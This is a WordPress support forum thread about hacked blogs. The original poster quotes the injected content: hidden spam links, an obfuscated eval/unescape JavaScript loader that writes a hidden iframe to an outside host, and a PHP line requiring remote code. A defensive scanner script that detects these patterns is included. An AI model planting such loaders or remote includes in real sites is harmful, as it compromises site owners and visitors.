WordPress Exploit: script inserted into code (22 posts)

  1. andiz
    Member
    Posted 6 years ago #

    Lately some of my WordPress blogs have been targeted by some hacker. Every time I check out the source of my blogs I see these kinds of links:

    </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>

    It has nothing to do with my theme, I'm using my own theme and I am 100% sure that the theme is not the source of the problem.

    I have been monitoring my weblogs to see what the cause of the problem is. Here is a list of what I tried to stop it:

    - Upgrade to the latest WP (Yet it kept coming back)
    - Secure WP admin with htaccess (No effect)
    - Change FTP password
    - Check permissions of files and folders
    - Check plugins

    Another thing that I noticed is the following. Almost all of my themes also had the following code inserted at the end of the source code:

    <Script>
    <!--
    var d=document;
    eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
    //-->
    </Script>

    What I noticed is that the only solution was to rewrite the old WordPress files with the ones that I downloaded. I finally found where the code was being inserted: index.php in the root folder of the weblog.

    I would like to know the following things:

    - Is this because of my setup or is this some new WP exploit?
    - What can I do to stop these kinds of exploits in the future?

    Thanks!

  2. Jeremy Clark
    Moderator
    Posted 6 years ago #

    [Post released from Akismet queue]

  3. sensifreak
    Member
    Posted 6 years ago #

    It's an XSS, I think. Have you got a link to your site?

  4. sensifreak
    Member
    Posted 6 years ago #

    If it's the amsterdam, delete the comments I made; they are secure.

  5. andiz
    Member
    Posted 6 years ago #

    I found a temporary fix for the problem:
    I chmodded index.php to 444. That seems to stop the problem at this moment.

    Is there anything else I can do?

  6. andiz
    Member
    Posted 6 years ago #

    The problem is back again.

    Now they attacked the wp-content index.php file.
    This is what I found:

    <?php
    // Silence is golden.
    
    require('http://lovetabs.rxfeel.com/files/temp.php');
    
    ?>
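
A static check for the three injections quoted in posts 1 and 6 (markup appended after `</html>`, an `eval(unescape(...))` script, and a `require` of a remote URL), added here as an example and not code from any poster or from WordPress. The sample strings and the `.example` hostnames are constructed, and the payload is only percent-decoded, never executed.

```python
import os
import re
from urllib.parse import unquote

# Patterns modelled on the injected snippets quoted in this thread.
TRAILING = re.compile(r"</html>\s*(\S.*)", re.I | re.S)
EVAL_UNESCAPE = re.compile(r"eval\(\s*unescape\(\s*[\"']([^\"']+)[\"']", re.I)
REMOTE_INCLUDE = re.compile(
    r"\b(?:require|include)(?:_once)?\s*\(?\s*[\"'](https?://[^\"']+)[\"']", re.I)
URL = re.compile(r"https?://[^\s'\"\\<>]+", re.I)

def scan_text(text):
    """Return (indicator, detail) findings for one file's contents."""
    findings = []
    m = TRAILING.search(text)
    if m:  # anything non-blank after the closing </html> tag
        findings.append(("markup-after-html-close", m.group(1)[:60]))
    for m in EVAL_UNESCAPE.finditer(text):
        decoded = unquote(m.group(1))  # static decode only, nothing is run
        findings.append(("eval-unescape", URL.findall(decoded)))
    for m in REMOTE_INCLUDE.finditer(text):
        findings.append(("remote-include", m.group(1)))
    return findings

def scan_tree(root, exts=(".php", ".htm", ".html")):
    """Walk root and return {path: findings} for files with at least one hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples (not the thread's real payloads or hosts).
_JS = "d.write('<IFRAME src=\\'http://injected.example/in.cgi\\' style=\\'display: none\\'>')"
SAMPLE_THEME = "<html><body>hi</body></html>\n<Script>eval( unescape( \"%s\" ));</Script>" % (
    "".join("%%%02x" % ord(c) for c in _JS))
SAMPLE_INDEX = "<?php\n// Silence is golden.\nrequire('http://remote.example/temp.php');\n?>"
SAMPLE_CLEAN = "<?php\n// Silence is golden.\n?>"

if __name__ == "__main__":
    for label, sample in (("theme", SAMPLE_THEME), ("index", SAMPLE_INDEX)):
        print(label, scan_text(sample))
```

Running `scan_tree()` over the web root on a schedule and comparing the result with the previous run shows when a file has been re-infected, which is what kept happening in this thread.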

  7. I'd talk to your host.

  8. andiz
    Member
    Posted 6 years ago #

    Apparently I am not the only one:

    http://support.technorati.com/discussions/topic/3295

    Technorati noticed the issue also and mailed every single member that uses WordPress.

  9. whooami
    Member
    Posted 6 years ago #

    Technorati noticed the issue also and mailed every single member that uses WordPress.

    That's simply not true, since I didn't get an e-mail. In fact, they have no way of doing such a thing.

  10. mvandemar
    Member
    Posted 6 years ago #

    Yeah, I didn't get an email either. They must not love you and me whoo. :P

    Ian did post about it on the Technorati blog though. Any ideas what might be going on?

  11. Michael Torbert
    WordPress Virtuoso
    Posted 6 years ago #

    I wouldn't be too worried. It could be something, but a lot of people have crappy/insecure servers and then blame WordPress when they're compromised.
    I have many many WordPress installations on a variety of different servers, and have never had one hacked.

  12. segal
    Member
    Posted 6 years ago #

    I'm running WordPress 2.5.1 and today got the same problem. Does anyone know how I can prevent it?

    Site is http://dvicr.com. Code inserted on every index.php and every htm page on all my sites (my sites share same space on godaddy).

  13. obscure
    Member
    Posted 6 years ago #

    Here is a list of what I tried to stop it:

    - Upgrade to the latest WP (Yet it kept coming back)
    - Secure WP admin with htaccess (No effect)
    - Change FTP password
    - Check permissions of files and folders
    - Check plugins

    Did you change your admin password?
    Did you delete all the compromised files and posts?

  14. Marcel Brinkkemper
    Member
    Posted 6 years ago #

    Are you on a shared host?
    Some user on the same host could use scripts to insert the code on your site.
    I'd talk to your host about this soon.

  15. segal
    Member
    Posted 6 years ago #

    Are you on a shared host?
    Some user on the same host could use scripts to insert the code on your site.
    I'd talk to your host about this soon.

    Yes, I'm on a shared host, but it's pretty secure (godaddy.com), so I don't think anyone can break into other users' areas.

    Did you change your admin password?
    Did you delete all the compromised files and posts?

    Sure, and I also secured the blog with all the knowledge I have. No evil scripts so far. I still wonder how it got there in the first place.

  16. Michael Torbert
    WordPress Virtuoso
    Posted 6 years ago #

    On all your sites? Doesn't sound like a WordPress issue to me. Odds are, your server account or server itself has been compromised.
    Change all your server passwords (including mysql).

  17. macsoft3
    Member
    Posted 6 years ago #

    I would create a new administrative username for WP deleting all others. If they know your administrative username, they can just run a program to guess the password just like guessing a PIN number.

  18. segal
    Member
    Posted 6 years ago #

    Attack repeated. I've already changed password and did all the stuff, but they somehow managed to change index files to files pointing to their site pizdec dot ru. It is other guys using the same software - previous attack used to promote another site.

  19. whooami
    Member
    Posted 6 years ago #

    segal, I really recommend using my post-logger plugin.

  20. segal
    Member
    Posted 6 years ago #

    segal, I really recommend using my post-logger plugin.

    Thanks, installed.

  21. Sonika
    Member
    Posted 6 years ago #

    Maybe the plugin "anti xss attack" can help you?
    for wp 2.5:
    http://mywordpress.ru/plugins/anti-xss-attack/2/
    for wp 2.3.3:
    http://maxsite.org/anti-xss-attack-update

  22. segal
    Member
    Posted 6 years ago #

    Thank you!

Topic Closed

This topic has been closed to new replies.
